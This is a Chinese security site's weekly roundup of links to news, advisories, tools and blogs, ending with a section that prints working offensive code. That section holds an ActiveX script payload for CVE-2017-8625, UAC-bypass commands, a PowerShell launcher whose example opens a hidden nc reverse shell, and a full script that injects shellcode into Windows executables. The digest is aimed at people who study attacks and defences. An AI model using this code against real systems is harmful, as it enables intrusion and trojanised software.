最新消息:

【第二期】国内外技术牛文每周精选

安全眼 demon 11750浏览 0评论

安全资讯

LockPoS恶意软件正通过一种新的注入技术潜入内核

https://www.darkreading.com/endpoint/lockpos-malware-sneaks-onto-kernel-via-new-injection-technique/d/d-id/1330757

CPU漏洞引爆全球危机 360安全专家深度解析防御策略

https://www.anquanke.com/post/id/93735

关于Meltdown和Spectre你所需要知道的

blog.malwarebytes.com/security-world/2018/01/meltdown-and-spectre-what-you-need-to-know/

安全漏洞

CVE-2018-0743 |?Windows子系统提供的特权提升漏洞

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0743

SSD安全公告-vBulletin routestring未经验证的远程代码执行

blogs.securiteam.com/index.php/archives/3609

WordPress插件bbpress存在SQL注入漏洞

https://blog.sucuri.net/2017/11/sql-injection-bbpress.html

三星手机预装内置浏览器同源策略绕过漏洞

https://amp.thehackernews.com/thn/2017/12/same-origin-policy-bypass.html?__twitter_impression=true

IoT安全

通过私有APN入侵物联网供应商和智能汽车

https://www.pentestpartners.com/security-blog/hacking-iot-vendors-smart-cars-via-private-apns/

密码破解

使用hashcat破解私有APN密钥

https://www.pentestpartners.com/security-blog/how-to-crack-private-apn-keys-with-hashcat/

破解加密的PDF文档系列 – Part?1~ Part 4

blog.didierstevens.com/2017/12/26/cracking-encrypted-pdfs-part-1/

blog.didierstevens.com/2017/12/27/cracking-encrypted-pdfs-part-2/

blog.didierstevens.com/2017/12/28/cracking-encrypted-pdfs-part-3/

blog.didierstevens.com/2017/12/29/cracking-encrypted-pdfs-conclusion/

安全报告

深度报告 | 揭秘朝鲜黑客组织Lazarus Group对加密货币的窃取手段

http://www.freebuf.com/articles/paper/158794.html

全球网络安全威胁报告合集

https://research.checkpoint.com/category/threat-intelligence-reports/

https://research.checkpoint.com/category/threat-intelligence-reports/page/2/

移动安全

11款安卓反病毒应用推荐

fossbytes.com/best-android-antivirus-apps/

安全工具

利用Cowrie SSH蜜罐溯源网络攻击路径

https://null-byte.wonderhowto.com/how-to/use-cowrie-ssh-honeypot-catch-attackers-your-network-0181600/

Sublist3r:子域名快速枚举工具

darknet.org.uk/2017/12/sublist3r-fast-python-subdomain-enumeration-tool/

Msf支持Python编写模块

https://blog.rapid7.com/2017/12/28/regifting-python-in-metasploit/?from=timeline

本地密码查看工具LaZagne中的自定义脚本开发

https://3gstudent.github.io/3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91/

Github:https://github.com/AlessandroZ/LaZagne

Hacker Show

看黑客如何利用航空公司登机牌上的隐藏数据hack航班

https://null-byte.wonderhowto.com/how-to/hackers-use-hidden-data-airline-boarding-passes-hack-flights-0180728/

安全项目:

使用Vulhub一键搭建漏洞测试靶场

https://vulhub.org/#/index/

CVE-2017-11882

https://github.com/unamer/CVE-2017-11882/

番外:<技术干货铺2>

1.Forfiles PAYLOAD

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

https://technet.microsoft.com/zh-cn/library/cc753551(v=ws.10).aspx

视频演示:

2.CVE-2017-8625 -HTML-IE

<html> <body> <script type="text/jscript"> var r =new ActiveXObject("Wscript.shell").Run("calc.exe"); </script> </body> </html>

使用CVE-2017-8625 – 绕过设备保护UMCI

Bypassing Device guard UMCI using CHM – CVE-2017-8625

UMCI vs Internet Explorer: Exploring CVE-2017-8625

视频演示:

3.UAC-TokenMagic.ps1 绕UAC

https://github.com/FuzzySecurity/PowerShell-Suite

参考:

https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html

https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html

https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html

.EXAMPLE C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe .

EXAMPLE C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c calc.exe" -ProcPID 1116

C:\PS> UAC-TokenMagic?-BinPath?C:\Windows\System32\cmd.exe??-ProcPID?3624

视频演示:

4.Invoke-CreateProcess

Code

function Invoke-CreateProcess {
<#
.SYNOPSIS

     -Binary            Full path of the module to be executed.
                       
     -Args              Arguments to pass to the module, e.g. "/c calc.exe". Defaults
                        to $null if not specified.
                       
     -CreationFlags     Process creation flags:
                          0x00000000 (NONE)
                          0x00000001 (DEBUG_PROCESS)
                          0x00000002 (DEBUG_ONLY_THIS_PROCESS)
                          0x00000004 (CREATE_SUSPENDED)
                          0x00000008 (DETACHED_PROCESS)
                          0x00000010 (CREATE_NEW_CONSOLE)
                          0x00000200 (CREATE_NEW_PROCESS_GROUP)
                          0x00000400 (CREATE_UNICODE_ENVIRONMENT)
                          0x00000800 (CREATE_SEPARATE_WOW_VDM)
                          0x00001000 (CREATE_SHARED_WOW_VDM)
                          0x00040000 (CREATE_PROTECTED_PROCESS)
                          0x00080000 (EXTENDED_STARTUPINFO_PRESENT)
                          0x01000000 (CREATE_BREAKAWAY_FROM_JOB)
                          0x02000000 (CREATE_PRESERVE_CODE_AUTHZ_LEVEL)
                          0x04000000 (CREATE_DEFAULT_ERROR_MODE)
                          0x08000000 (CREATE_NO_WINDOW)
                        
     -ShowWindow        Window display flags:
                          0x0000 (SW_HIDE)
                          0x0001 (SW_SHOWNORMAL)
                          0x0001 (SW_NORMAL)
                          0x0002 (SW_SHOWMINIMIZED)
                          0x0003 (SW_SHOWMAXIMIZED)
                          0x0003 (SW_MAXIMIZE)
                          0x0004 (SW_SHOWNOACTIVATE)
                          0x0005 (SW_SHOW)
                          0x0006 (SW_MINIMIZE)
                          0x0007 (SW_SHOWMINNOACTIVE)
                          0x0008 (SW_SHOWNA)
                          0x0009 (SW_RESTORE)
                          0x000A (SW_SHOWDEFAULT)
                          0x000B (SW_FORCEMINIMIZE)
                          0x000B (SW_MAX)
              
     -StartF            Bitfield to influence window creation:
                          0x00000001 (STARTF_USESHOWWINDOW)
                          0x00000002 (STARTF_USESIZE)
                          0x00000004 (STARTF_USEPOSITION)
                          0x00000008 (STARTF_USECOUNTCHARS)
                          0x00000010 (STARTF_USEFILLATTRIBUTE)
                          0x00000020 (STARTF_RUNFULLSCREEN)
                          0x00000040 (STARTF_FORCEONFEEDBACK)
                          0x00000080 (STARTF_FORCEOFFFEEDBACK)
                          0x00000100 (STARTF_USESTDHANDLES)

.DESCRIPTION

  Author: Ruben Boonen (@FuzzySec)
  License: BSD 3-Clause
  Required Dependencies: None
  Optional Dependencies: None

.EXAMPLE
  Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW

  C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1
  
.EXAMPLE
  Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW

  C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1

#>

  param (
        [Parameter(Mandatory = $True)]
    [string]$Binary,
        [Parameter(Mandatory = $False)]
    [string]$Args=$null,
        [Parameter(Mandatory = $True)]
    [Int]$CreationFlags,
        [Parameter(Mandatory = $True)]
    [Int]$ShowWindow,
        [Parameter(Mandatory = $True)]
    [Int]$StartF
  )  

    # Define all the structures for CreateProcess
  Add-Type -TypeDefinition @"
  using System;
  using System.Diagnostics;
  using System.Runtime.InteropServices;
  
  [StructLayout(LayoutKind.Sequential)]
  public struct PROCESS_INFORMATION
  {
    public IntPtr hProcess;
        public IntPtr hThread;
        public uint dwProcessId;
        public uint dwThreadId;
  }
  
  [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  public struct STARTUPINFO
  {
    public uint cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
    public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
    public uint dwYCountChars;
        public uint dwFillAttribute;
        public uint dwFlags;
        public short wShowWindow;
    public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
    public IntPtr hStdError;
  }
  
  [StructLayout(LayoutKind.Sequential)]
  public struct SECURITY_ATTRIBUTES
  {
    public int length;
        public IntPtr lpSecurityDescriptor;
        public bool bInheritHandle;
  }
  
  public static class Kernel32
  {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool CreateProcess(
      string lpApplicationName,
            string lpCommandLine,
            ref SECURITY_ATTRIBUTES lpProcessAttributes, 
      ref SECURITY_ATTRIBUTES lpThreadAttributes,
            bool bInheritHandles,
            uint dwCreationFlags, 
      IntPtr lpEnvironment,
            string lpCurrentDirectory,
            ref STARTUPINFO lpStartupInfo, 
      out PROCESS_INFORMATION lpProcessInformation);
  }
"@
  
  # StartupInfo Struct
  $StartupInfo = New-Object STARTUPINFO
  $StartupInfo.dwFlags = $StartF # StartupInfo.dwFlag
  $StartupInfo.wShowWindow = $ShowWindow # StartupInfo.ShowWindow
  $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
  
  # ProcessInfo Struct
  $ProcessInfo = New-Object PROCESS_INFORMATION
  
  # SECURITY_ATTRIBUTES Struct (Process & Thread)
  $SecAttr = New-Object SECURITY_ATTRIBUTES
  $SecAttr.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SecAttr)
  
  # CreateProcess --> lpCurrentDirectory
  $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
  
  # Call CreateProcess
  [Kernel32]::CreateProcess($Binary, $Args, [ref] $SecAttr, [ref] $SecAttr, $false, $CreationFlags, [IntPtr]::Zero, $GetCurrentPath, [ref] $StartupInfo, [ref] $ProcessInfo) |out-null
  
  echo "`nProcess Information:"
  Get-Process -Id $ProcessInfo.dwProcessId |ft
}

5. Subvert-PE-shellcode-Calc

http://www.fuzzysecurity.com/scripts/18.html

Code

function Subvert-PE {
<#
.SYNOPSIS

    Inject shellcode into a PE image while retaining the PE functionality.

  Author: Ruben Boonen (@FuzzySec)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
  
.DESCRIPTION

  Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry point. After the shellcode executes, program execution is handed back over to the legitimate PE entry point.
  
.PARAMETER Path

    Path to portable executable.
  
.PARAMETER Write

    Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image Base" and dump the memory at the null-byte location.

.EXAMPLE

    C:\PS> Subvert-PE -Path C:\Path\To\PE.exe
  
.EXAMPLE

    C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write

.LINK

  http://www.fuzzysecurity.com/
#>

  param (
        [Parameter(Mandatory = $True)]
    [string]$Path,
    [parameter(parametersetname="Write")]
    [switch]$Write
  )  

    # Read File bytes
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    
    New-Variable -Option Constant -Name Magic -Value @{
            "010b" =  "PE32"
            "020b" =  "PE32+"
    }
    
    # Function courtesy of @mattifestation
    function Local:ConvertTo-Int{
        Param(
            [Parameter(Position = 1, Mandatory = $True)]
            [Byte[]]
            $array)
        switch ($array.Length){
            # Convert to WORD & DWORD
            2 { Write-Output ( [UInt16] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
            4 { Write-Output (  [Int32] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
        }
    }
    
    # Offsets for calculations
    $PE = ConvertTo-Int $bytes[63..60]
    $NumOfPESection = ConvertTo-Int $bytes[($PE+7)..($PE+6)]
    $OptSize = ConvertTo-Int $bytes[($PE+21)..($PE+20)]
    $Opt = $PE + 24
    $SecTbl = $Opt + $OptSize
    
    # Entry point offset
    $EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
  # Duplicate for calculating JMP later
  $EntryPointBefore = ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]
  echo "`nLegitimate Entry Point Offset:   0x$EntryPointOffset"
    
    # PE magic number
    $MagicVal = $Magic[('{0:X4}' -f (ConvertTo-Int $bytes[($Opt+1)..($Opt+0)]))]
    # Preferred ImageBase, based on $MagicVal --> PE32 (DWORD), PE32+ (QWORD)
    If($MagicVal -eq "PE32"){
        $ImageBase = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+31)..($Opt+28)])
    
    }
    ElseIf($MagicVal -eq "PE32+"){
        $QWORD = ( [UInt64] ('0x{0}' -f ((($bytes[($Opt+30)..($Opt+24)]) | % {$_.ToString('X2')}) -join '')) )
        $ImageBase = '{0:X16}' -f $QWORD
    }
    
    # Preferred Image Base
    echo "Preferred PE Image Base:         0x$ImageBase"
    
    # Grab "Virtual Size" and "Virtual Address" for the CODE section.
    $SecVirtualSize = ConvertTo-Int $bytes[($SecTbl+11)..($SecTbl+8)]
    $SecVirtualAddress = ConvertTo-Int $bytes[($SecTbl+15)..($SecTbl+12)]
    
    # Precise start of CODE null-byte section!
    $NullCount = '{0:X8}' -f ($SecVirtualSize + $SecVirtualAddress)
  
  # Offset in PE is different [$SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData)]
  $SecPTRRawData = ConvertTo-Int $bytes[($SecTbl+23)..($SecTbl+20)]
  $ShellCodeWrite = ($SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData))
  
  # Hexdump of null-byte padding (before)
  echo "`nNull-Byte Padding dump:"
  $output = ""
  foreach ( $count in $bytes[($ShellCodeWrite - 1)..($ShellCodeWrite+504)] ) {
    if (($output.length%32) -eq 0){
      $output += "`n"
    }
    else{
      $output += "{0:X2} " -f $count
    }
  } echo "$output`n"
  
    # If -Write flag is set
  if($Write){
    
        # Set shellcode variable based on PE architecture
        If($MagicVal -eq "PE32"){
            # 32-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
            # Size: 76 bytes
            $ShellCode = @(0x60,0x31,0xD2,0x52,0x68,0x63,0x61,0x6C,0x63,
            0x54,0x59,0x52,0x51,0x64,0x8B,0x72,0x30,0x8B,0x76,0x0C,0x8B,
            0x76,0x0C,0xAD,0x8B,0x30,0x8B,0x7E,0x18,0x8B,0x5F,0x3C,0x8B,
            0x5C,0x1F,0x78,0x8B,0x74,0x1F,0x20,0x01,0xFE,0x8B,0x54,0x1F,
            0x24,0x0F,0xB7,0x2C,0x17,0x42,0x42,0xAD,0x81,0x3C,0x07,0x57,
            0x69,0x6E,0x45,0x75,0xF0,0x8B,0x74,0x1F,0x1C,0x01,0xFE,0x03,
            0x3C,0xAE,0xFF,0xD7,0x58,0x58,0x61)
        }
        ElseIf($MagicVal -eq "PE32+"){
            # 64-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
            # Size: 97 bytes
            $ShellCode = @(0x53,0x56,0x57,0x55,0x6A,0x60,0x5A,0x68,0x63,
            0x61,0x6C,0x63,0x54,0x59,0x48,0x29,0xD4,0x65,0x48,0x8B,0x32,
            0x48,0x8B,0x76,0x18,0x48,0x8B,0x76,0x10,0x48,0xAD,0x48,0x8B,
            0x30,0x48,0x8B,0x7E,0x30,0x03,0x57,0x3C,0x8B,0x5C,0x17,0x28,
            0x8B,0x74,0x1F,0x20,0x48,0x01,0xFE,0x8B,0x54,0x1F,0x24,0x0F,
            0xB7,0x2C,0x17,0x8D,0x52,0x02,0xAD,0x81,0x3C,0x07,0x57,0x69,
            0x6E,0x45,0x75,0xEF,0x8B,0x74,0x1F,0x1C,0x48,0x01,0xFE,0x8B,
            0x34,0xAE,0x48,0x01,0xF7,0x99,0xFF,0xD7,0x48,0x83,0xC4,0x68,
            0x5D,0x5F,0x5E,0x5B)
        }
        
        # Inject all the things!
        for($i=0; $i -lt $ShellCode.Length; $i++){
            $bytes[($ShellCodeWrite + $i)] = $ShellCode[$i]
        }
        
        # Set new Entry Point Offset --> $NullCount
        $bytes[($Opt+19)] = [byte]('0x' + $NullCount.Substring(0,2))
        $bytes[($Opt+18)] = [byte]('0x' + $NullCount.Substring(2,2))
        $bytes[($Opt+17)] = [byte]('0x' + $NullCount.Substring(4,2))
        $bytes[($Opt+16)] = [byte]('0x' + $NullCount.Substring(6,2))
        
        # Modified Entry Point
        $EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
        echo "Modified Entry Point Offset:     0x$EntryPointOffset"
        
        # Calculate & append farJMP
        $Distance = '{0:x}' -f ($EntryPointBefore - (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]) - $ShellCode.Length - 5)
        echo "Inject Far JMP:                  0xe9$Distance"
        $bytes[($ShellCodeWrite + $ShellCode.Length)] = 0xE9
        $bytes[($ShellCodeWrite + $ShellCode.Length + 1)] = [byte]('0x' + $Distance.Substring(6,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 2)] = [byte]('0x' + $Distance.Substring(4,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 3)] = [byte]('0x' + $Distance.Substring(2,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 4)] = [byte]('0x' + $Distance.Substring(0,2))
        
        # Hexdump of null-byte padding (after)
        echo "`nNull-Byte Padding After:"
        $output = ""
        foreach ( $count in $bytes[($ShellCodeWrite - 1)..($ShellCodeWrite+504)] ) {
            if (($output.length%32) -eq 0){
                $output += "`n"
            }
            else{
                $output += "{0:X2} " -f $count
            }
        } echo "$output`n"
    
        [System.IO.File]::WriteAllBytes($Path, $bytes)
    }
}

视频演示:

技术博客推荐:

1.Google的Project Zero团队博客

https://googleprojectzero.blogspot.co.uk/

2.NetSPI博客

https://blog.netspi.com/

3.html5安全备忘录

https://html5sec.org/

4.寻找内存中的.NET攻击

https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks

5.klion’s blog

https://klionsec.github.io/

* 本文由 Demon&Eternal 共同整理,转载请注明来自Secist.com

转载请注明:即刻安全 » 【第二期】国内外技术牛文每周精选

您必须 登录 才能发表评论!

网友最新评论 (2)



合作伙伴